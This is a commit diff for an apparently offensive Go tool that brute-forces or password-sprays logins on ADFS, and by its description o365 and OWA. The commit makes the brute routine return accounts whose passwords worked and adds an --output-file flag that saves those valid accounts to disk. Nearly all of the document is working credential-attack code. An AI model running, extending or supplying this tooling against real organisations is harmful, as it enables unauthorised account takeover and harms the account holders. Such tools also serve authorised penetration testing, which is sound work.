Save output to a file for brute forcing ADFS

Author: nodauf

src/adfs/brute.go

@@ -9,15 +9,18 @@ import (
 )
 
 // Brute will bruteforce or spray passwords on the specified users.
-func (options *Options) Brute() {
+func (options *Options) Brute() []string {
 	log = options.Log
 	var wg sync.WaitGroup
+	var validusers []string
+	mux := &sync.Mutex{}
+
 	// If the target is not specified, we will try to find the ADFS URL with the endpoint getuserrealm
 	if options.Target == "" {
 		options.Target = options.findTarget(options.Domain)
 		if options.Target == "" {
 			log.Error("The ADFS URL was not found")
-			return
+			return validusers
 		}
 		log.Verbose("An ADFS instance has been found on " + options.Target)
 	}
@@ -40,11 +43,18 @@ func (options *Options) Brute() {
 					time.Sleep(time.Duration(options.Sleep) * time.Second)
 				}
 				if options.NoBruteforce {
-					options.brute(email, passwordList[j])
+					if options.brute(email, passwordList[j]) {
+						mux.Lock()
+						validusers = append(validusers, email)
+						mux.Unlock()
+					}
 
 				} else {
 					for _, password := range passwordList {
 						if options.brute(email, password) {
+							mux.Lock()
+							validusers = append(validusers, email)
+							mux.Unlock()
 							break // No need to continue if password is valid
 						}
 					}
@@ -65,5 +75,6 @@ func (options *Options) Brute() {
 
 	close(queue)
 	wg.Wait()
+	return validusers
 
 }

src/cmd/brute/adfs.go

@@ -34,7 +34,7 @@ go run main.go bruteSpray adfs -t adfs.contoso.com -u [email protected]  -p A
 		adfsOptions.NoBruteforce = noBruteforce
 		adfsOptions.Sleep = sleep
 		adfsOptions.Proxy = proxy
-		adfsOptions.Brute()
+		validUsers = adfsOptions.Brute()
 	},
 }
 

src/cmd/brute/bruteSpray.go

@@ -6,6 +6,7 @@ import (
 	"net/http"
 	"net/url"
 	"os"
+	"strings"
 
 	"github.com/spf13/cobra"
 )
@@ -16,14 +17,22 @@ var debug bool
 var noBruteforce bool
 var sleep int
 var proxy func(*http.Request) (*url.URL, error)
-
+var validUsers []string
+var output string
 var proxyString string
 
 // BruteSprayCmd represents the bruteSpray command
 var BruteSprayCmd = &cobra.Command{
 	Use:   "bruteSpray",
 	Short: "Spray a password or bruteforce a user's password",
 	Long:  `Different services are supported. The authentication could be on an ADFS instance, an o365 or an OWA.`,
+	PersistentPostRun: func(cmd *cobra.Command, args []string) {
+		if output != "" {
+			if err := os.WriteFile(output, []byte(strings.Join(validUsers, "\n")), 0666); err != nil {
+				fmt.Println(err)
+			}
+		}
+	},
 }
 
 func init() {
@@ -32,6 +41,7 @@ func init() {
 	cobra.OnInitialize(initProxy)
 	BruteSprayCmd.PersistentFlags().BoolVarP(&verbose, "verbose", "v", false, "Verbose")
 	BruteSprayCmd.PersistentFlags().BoolVar(&debug, "debug", false, "Debug")
+	BruteSprayCmd.PersistentFlags().StringVarP(&output, "output-file", "o", "", "The out file for valid emails")
 	BruteSprayCmd.PersistentFlags().BoolVarP(&noBruteforce, "no-bruteforce", "n", false, "No spray when using file for username and password (user1 => password1, user2 => password2)")
 	BruteSprayCmd.PersistentFlags().IntVarP(&sleep, "sleep", "s", 0, "Sleep in seconds before sending an authentication request")
 	BruteSprayCmd.PersistentFlags().StringVar(&proxyString, "proxy", "", "Sleep in seconds before sending an authentication request")